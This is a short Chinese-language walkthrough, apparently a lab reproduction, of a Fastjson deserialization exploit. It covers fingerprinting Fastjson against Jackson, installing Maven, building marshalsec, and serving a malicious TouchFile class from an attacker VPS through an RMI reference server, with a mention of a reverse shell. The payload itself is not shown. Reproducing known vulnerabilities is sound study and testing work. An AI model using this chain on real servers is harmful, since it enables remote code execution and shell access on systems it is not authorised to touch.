漏洞检测
区分 Fastjson 和 Jackson
{"name":"S","age":21}
和
{"name":"S","age":21,"agsbdkjada__ss_d":123}
我们向这个地址POST一个JSON对象,即可更新服务端的信息:
curl http://your-ip:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'
复现
安装mvn
mkdir -p /server/tools
cd /server/tools/
wget https://mirrors.cnnic.cn/apache/maven/maven-3/3.5.4/binaries/apache-maven-3.5.4-bin.tar.gz --no-check-certificate
tar -xf apache-maven-3.5.4-bin.tar.gz
mv apache-maven-3.5.4 /usr/local/maven
ln -s /usr/local/maven/bin/mvn /usr/bin/mvn
echo " ">>/etc/profile
echo "# Made for mvn env by zhaoshuai on $(date +%F)">>/etc/profile
echo 'export MAVEN_HOME=/usr/local/maven'>>/etc/profile
echo 'export PATH=$MAVEN_HOME/bin:$PATH'>>/etc/profile
source /etc/profile
echo $PATH
mvn -version
使用marshalsec快速开启rmi或ldap服务
git clone https://github.com/mbechler/marshalsec
cd marshalsec
下载marshalsec,使用maven编译jar包
mvn clean package -DskipTests
cd target
创建文件夹fastjson,创建文件TouchFile.java
或者反弹shell
javac TouchFile.java 创建class文件
vps开监听
python -m SimpleHTTPServer
( TouchFile.class TouchFile.java 放在此目录下)
开启rmi或ldap服务 8000是上方服务的端口
(/marshalsec/target)目录下
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://VPS:8000/#TouchFile" 9999
执行poc
文件创建成功
shell反弹成功
